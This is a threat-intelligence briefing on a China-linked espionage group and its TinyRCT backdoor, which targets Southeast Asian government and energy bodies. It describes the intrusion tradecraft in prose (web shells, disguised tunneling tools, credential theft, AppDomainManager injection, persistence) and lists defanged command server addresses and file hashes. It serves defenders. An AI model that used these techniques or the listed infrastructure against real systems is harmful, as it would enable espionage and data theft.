A Chinese speaking espionage crew has spent much of the past year burrowing into government bodies and state owned energy companies across Southeast Asia, and researchers at Palo Alto Networks' Unit 42 say they have caught the group deploying a custom, previously undocumented backdoor they call TinyRCT.
Unit 42 tracks the activity as CL-STA-1062 and assesses with high confidence that it is the same cluster Cisco Talos reported as UAT-7237, which earlier hit web hosting infrastructure in Taiwan. The operators have been active since at least March 2022, and between October and December 2025 alone the team observed the likely compromise of at least ten organizations in the region.
Who is affected
The targeting is strategic. In September 2025 the attackers breached a Southeast Asian government entity, planted web shells and quietly exfiltrated database records and even an entire directory of web server source code, then used that foothold to scout a second government body in the same country. Months later they moved into two state owned critical energy infrastructure operators, the kind of intrusion that hands a foreign intelligence service insight into, or a potential lever over, a country's power supply. For context on China linked operators working the same region, see our coverage of Mustang Panda's multi year Southeast Asian government espionage and a decade long China linked intrusion into a critical network.
How the attack works
Intrusions typically start with the attackers exploiting an exposed web application to drop an ASPX web shell, which becomes their command hub for running commands and pulling in more tools. They lean heavily on off the shelf software, using SoftEther VPN, VNT and yuze as tunnels to move through networks and smuggle data out, often renaming the binaries to look like VMware components or an EDR agent. Mimikatz harvests passwords, the JuicyPotato tool escalates privileges, and stolen files are bundled into password protected RAR archives before being shipped to attacker controlled servers.
The bespoke piece is TinyRCT, a lightweight remote access trojan written in C#. Unit 42 found it after spotting a suspicious file named PerfWatson2.exe, a name borrowed from a legitimate Visual Studio component, sitting on the group's infrastructure. The malware arrives inside a booby trapped archive (chrome_setup.zip) that abuses a .NET trust feature called AppDomainManager injection to load malicious code inside a signed, legitimate installer. A loader then fetches the backdoor and registers a scheduled task so it relaunches at every login.
TinyRCT itself is built for quiet surveillance. It encrypts its traffic with a hard coded AES-128 key, beacons to its server roughly every ten seconds, and supports shell command execution, file listing and theft, screen capture, and a self destruct routine that wipes the malware and its scheduled task to erase evidence. It also refuses to run unless it is launched from the user's AppData folder, a simple trick to dodge sandboxes and analysts. Tellingly, the code contains a comment written in Simplified Chinese.
What you should do
There is no patch here, because this is intrusion tradecraft rather than a single bug. Unit 42 recommends strict behavioral monitoring and execution restrictions on untrusted binaries, which it says blocked TinyRCT in testing. Defenders should hunt for VPN or tunneling tools masquerading as system files, suspicious scheduled tasks using GoogleUpdater style names, and curl based system enumeration beaconing out to unfamiliar IP addresses.
Indicators of compromise
Key defanged indicators from the report: the staging and download server 139[.]180[.]134[.]221, the TinyRCT command server at 45[.]32[.]113[.]172, and additional C2 hosts 202[.]182[.]102[.]5 and 45[.]76[.]210[.]43. The TinyRCT payload carries SHA256 4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384, and the initial chrome_setup.zip lure is 00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.